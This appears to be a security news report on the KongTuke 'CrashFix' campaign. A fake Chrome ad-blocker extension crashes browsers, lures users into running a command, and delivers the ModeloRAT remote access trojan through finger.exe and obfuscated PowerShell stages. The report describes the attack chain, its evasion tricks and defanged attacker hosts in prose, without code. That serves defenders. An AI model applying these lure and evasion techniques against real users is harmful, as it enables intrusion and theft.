Cybersecurity researchers have detailed the ongoing "KongTuke" campaign, which employs a malicious Google Chrome extension to intentionally crash web browsers and deceive users into executing arbitrary commands. This attack, dubbed "CrashFix" by Huntress, delivers a previously undocumented remote access trojan (RAT) known as ModeloRAT. The malicious extension, identified as "NexShield – Advanced Web Guardian," masqueraded as an ad blocker and was downloaded over 5,000 times before its removal from the Chrome Web Store. The extension is a near-identical copy of the legitimate uBlock Origin Lite.
Attack Mechanism
The KongTuke campaign, also tracked as 404 TDS, Chaya_002, LandUpdate808, and TAG-124, is a traffic distribution system that profiles victim hosts before redirecting them to a payload delivery site. This infrastructure has been leveraged by various cybercriminal groups, including Rhysida ransomware, Interlock ransomware, and TA866 (Asylum Ambuscade).
In the documented attack chain:
- Victims searching for an ad blocker encountered a malicious advertisement, leading them to the "NexShield" extension.
- The extension is designed to display a fake security warning claiming the browser stopped abnormally, prompting users to run a "scan."
- If a user opts to scan, they receive instructions to open the Windows Run dialog and execute a pre-copied command.
- This command initiates a denial-of-service (DoS) attack, causing the browser to freeze and crash through an infinite loop that creates new runtime port connections, leading to excessive memory consumption.
- The extension transmits a unique ID to an attacker-controlled server ("nexsnield[.]com") for victim tracking.
- Malicious behavior is delayed, activating 60 minutes post-installation and subsequently every 10 minutes.
- The fake security warning reappears upon browser restart if the extension remains installed.
- Anti-analysis techniques are used, such as disabling right-click menus and developer tool shortcuts.
Payload Delivery and ModeloRAT
The CrashFix command utilizes the legitimate Windows utility finger.exe to retrieve the next-stage payload from an attacker's server ("199.217.98[.]108"). This payload is a PowerShell command that retrieves a secondary PowerShell script. This script employs multiple layers of Base64 encoding and XOR operations to conceal the final malware, similar to methods used by SocGholish.
The decrypted payload performs several checks:
- It scans for over 50 analysis tools and virtual machine indicators, ceasing execution if detected.
- It determines if the machine is domain-joined or standalone.
- It sends an HTTP POST request to the server, including a list of installed antivirus products and a flag indicating the machine type ("ABCD111" for standalone, "BCDA222" for domain-joined hosts).
If the compromised system is domain-joined, the attack culminates in the deployment of ModeloRAT. This is a Python-based Windows remote access trojan that uses RC4 encryption for command-and-control (C2) communications to servers such as "170.168.103[.]208" or "158.247.252[.]178." ModeloRAT establishes persistence via the Windows Registry and can execute binaries, DLLs, Python scripts, and PowerShell commands. It also includes self-update and termination capabilities and varied beaconing logic to evade detection. For standalone workstations, a separate multi-stage infection sequence occurs, with the C2 server responding with a "TEST PAYLOAD!!!!" message, suggesting it may be in a testing phase.
This campaign demonstrates an evolution in social engineering tactics, leveraging user frustration caused by browser crashes to facilitate further infection.